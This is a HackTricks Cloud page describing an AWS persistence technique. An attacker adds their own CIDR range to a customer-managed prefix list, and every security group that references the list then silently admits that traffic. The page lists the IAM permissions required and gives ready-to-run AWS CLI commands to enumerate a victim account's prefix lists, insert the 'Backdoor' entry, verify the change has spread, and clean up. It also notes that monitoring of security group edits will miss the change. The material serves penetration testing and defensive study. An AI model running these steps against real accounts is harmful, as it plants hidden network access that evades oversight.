🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
☁️ HackTricks Cloud / AWS - Security Group Backdoor via Managed Prefix Lists

AWS - Security Group Backdoor via Managed Prefix Lists

{{#include ../../../../banners/hacktricks-training.md}}

Summary

Abuse customer-managed Prefix Lists to create a stealthy access path. If a security group (SG) rule references a managed Prefix List, anyone with the ability to modify that list can silently add attacker-controlled CIDRs. Every SG (and potentially Network ACL or VPC endpoint) that references the list immediately allows the new ranges without any visible SG change.

Impact

  • Instant expansion of allowed IP ranges for all SGs referencing the prefix list, bypassing change controls that only monitor SG edits.
  • Enables persistent ingress/egress backdoors: keep the malicious CIDR hidden in the prefix list while the SG rule appears unchanged.

Requirements

  • IAM permissions:
  • ec2:DescribeManagedPrefixLists
  • ec2:GetManagedPrefixListEntries
  • ec2:ModifyManagedPrefixList
  • ec2:DescribeSecurityGroups / ec2:DescribeSecurityGroupRules (to identify attached SGs)
  • Optional: ec2:CreateManagedPrefixList if creating a new one for testing.
  • Environment: At least one SG rule referencing the target customer-managed Prefix List.

Variables

REGION=us-east-1
PREFIX_LIST_ID=<pl-xxxxxxxx>
ENTRY_CIDR=<attacker-cidr/32>
DESCRIPTION="Backdoor – allow attacker"

Attack Steps

1) Enumerate candidate prefix lists and consumers

aws ec2 describe-managed-prefix-lists \
  --region "$REGION" \
  --query 'PrefixLists[?OwnerId==`<victim-account-id>`].[PrefixListId,PrefixListName,State,MaxEntries]' \
  --output table

aws ec2 get-managed-prefix-list-entries \
  --prefix-list-id "$PREFIX_LIST_ID" \
  --region "$REGION" \
  --query 'Entries[*].[Cidr,Description]'

Use aws ec2 describe-security-group-rules --filters Name=referenced-prefix-list-id,Values=$PREFIX_LIST_ID to confirm which SG rules rely on the list.

2) Add attacker CIDR to the prefix list

aws ec2 modify-managed-prefix-list \
  --prefix-list-id "$PREFIX_LIST_ID" \
  --add-entries Cidr="$ENTRY_CIDR",Description="$DESCRIPTION" \
  --region "$REGION"

3) Validate propagation to security groups

aws ec2 describe-security-group-rules \
  --region "$REGION" \
  --filters Name=referenced-prefix-list-id,Values="$PREFIX_LIST_ID" \
  --query 'SecurityGroupRules[*].{SG:GroupId,Description:Description}' \
  --output table

Traffic from $ENTRY_CIDR is now allowed wherever the prefix list is referenced (commonly outbound rules on egress proxies or inbound rules on shared services).

Evidence

  • get-managed-prefix-list-entries reflects the attacker CIDR and description.
  • describe-security-group-rules still shows the original SG rule referencing the prefix list (no SG modification recorded), yet traffic from the new CIDR succeeds.

Cleanup

aws ec2 modify-managed-prefix-list \
  --prefix-list-id "$PREFIX_LIST_ID" \
  --remove-entries Cidr="$ENTRY_CIDR" \
  --region "$REGION"

{{#include ../../../../banners/hacktricks-training.md}}